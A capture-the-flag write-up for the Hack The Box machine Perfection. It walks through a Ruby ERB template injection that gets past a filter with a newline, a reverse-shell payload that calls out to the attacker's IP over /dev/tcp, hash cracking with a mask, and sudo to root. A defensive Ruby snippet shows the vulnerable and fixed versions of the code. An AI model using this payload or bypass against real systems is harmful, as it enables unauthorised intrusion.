HTB Perfection writeup [20 pts]
Perfection is an easy Linux machine which starts with a Ruby SSTI in a grade calculator, combined with a CRLF injection to bypass the input restrictions. Once we have access as susan, it’s possible to see a mail from Tina that tells Susan how to generate her new password. Using this information and cracking the hash from a SQLite database, we can obtain susan’s password and use it to execute any command as root, because susan belongs to the sudo group.
Enumeration
Port scanning
I will start with a basic TCP port scan with nmap to see which ports are open and which services are running:
- -sVC: Identifies the service and version (and runs the default NSE scripts).
- -p-: Scans the whole port range (1-65535).
- --open: Shows only open ports, not filtered or closed ones.
- -sS: TCP SYN scan, which is faster because it doesn’t complete the connection.
- --min-rate 5000: Sends at least 5000 packets per second to speed up the scan (don’t do this in a real environment).
- -n: Disables DNS resolution.
- -v: Enables verbose output, so open ports are shown while the scan is running.
- -Pn: Disables host discovery (ping) and treats the host as up.
- -oN targeted: Saves the output in normal format to a file named “targeted”.
We can see port 22 for ssh and 80 for http.
Web enumeration
First, looking at the headers, we can see that the server is WEBrick (Ruby), which is something we will need later:
Taking a look at the website, it’s possible to see that it’s a tool to calculate the total grade in a class:
Clicking “Calculate your weighted grade” and entering data, we can see that the category names are reflected in the page:
I will intercept the request with Burp Suite and send it to Repeater to test for Ruby SSTI (since the app is Ruby), but the template characters (remember to URL-encode them) are blacklisted:
However, inserting a valid string followed by %0a (a URL-encoded line feed) before the payload works. This is known as CRLF injection:
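Why a line feed gets past the filter is worth seeing in code. The snippet below is an added example, not code from the Perfection machine: it assumes (as an illustration, since the page does not show the application source) that the category name was validated with a regex anchored by ^ and $, which in Ruby match at line boundaries rather than at the ends of the whole string. It shows that check beside a \A...\z version that cannot be bypassed with a newline, and the unsafe "build the template from user input" rendering beside a rendering that passes the value as data and escapes it. The category names and the harmless <%= 7*7 %> probe are constructed inputs.

```ruby
require 'erb'

# Vulnerable check (assumed for illustration): ^ and $ are line anchors in
# Ruby, so a value whose FIRST line is clean passes even if a second line,
# introduced with a line feed (%0a on the wire), contains ERB tags.
def category_ok_line_anchored?(value)
  value.match?(/^[A-Za-z0-9 ]+$/)
end

# Hardened check: \A and \z anchor to the start and end of the whole string,
# so an embedded newline makes the match fail.
def category_ok_string_anchored?(value)
  value.match?(/\A[A-Za-z0-9 ]+\z/)
end

# Unsafe rendering: the user value is concatenated into the template SOURCE,
# so any ERB tag inside it is evaluated by the server.
def render_unsafe(category)
  ERB.new("<p>Category: #{category}</p>").result(binding)
end

# Safe rendering: the template is a fixed string; the value is supplied as
# data and HTML-escaped, so ERB tags in it are printed literally.
SAFE_TEMPLATE = ERB.new('<p>Category: <%= ERB::Util.html_escape(category) %></p>')

def render_safe(category)
  SAFE_TEMPLATE.result_with_hash(category: category)
end

if __FILE__ == $PROGRAM_NAME
  probe = "Math\n<%= 7*7 %>"   # constructed input: clean first line, payload on line two
  puts "line-anchored check accepts probe:   #{category_ok_line_anchored?(probe)}"
  puts "string-anchored check accepts probe: #{category_ok_string_anchored?(probe)}"
  puts "unsafe render: #{render_unsafe(probe).inspect}"
  puts "safe render:   #{render_safe(probe).inspect}"
end
```

The first check accepts the two-line value and the unsafe renderer turns the probe into 49, which is exactly the behaviour exploited above; the string-anchored check rejects it, and even without any check the data-not-code renderer leaves the tags inert.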
Access as susan
Now we can insert a payload to gain access to the machine via a reverse shell, after spawning a nc listener:
SSTI Payload used:
<%= system('bash -c "bash -i >& /dev/tcp/10.10.15.19/443 0>&1"') %>
We successfully gained access as susan:
Now do the common tty trick to get a fully interactive shell (ctrl+c, ctrl+l, etc.):
- script /dev/null -c bash: Spawns a tty
- ctrl+z: puts the shell in the background so we can configure the terminal
- stty raw -echo; fg: gives us the shell back again
- reset xterm: resets the terminal to give us the bash console
- export TERM=xterm: lets us use ctrl+l to clear the terminal
- export SHELL=bash: tells the system that we are using a bash console
And we can see user.txt:
Privilege escalation to root
In the Migration directory, we have a SQLite database from which we can extract some hashes:
These hashes are SHA-256. However, they are not crackable with rockyou:
Something important to take into account is that we belong to the sudo group, so if we manage to get susan’s password, we can execute any command as root:
Looking at susan’s mail, we can see that tina is advising susan that she needs to update her password due to a migration, and we have the required format:
I will use hashcat, specifying the format as a mask, and try to crack it:
Note: -a 3 specifies brute-force (mask attack) mode and ?d is the charset for digits.
And we have the password! Now we can execute bash as root and read root.txt:
That’s the machine, hope you liked it! :)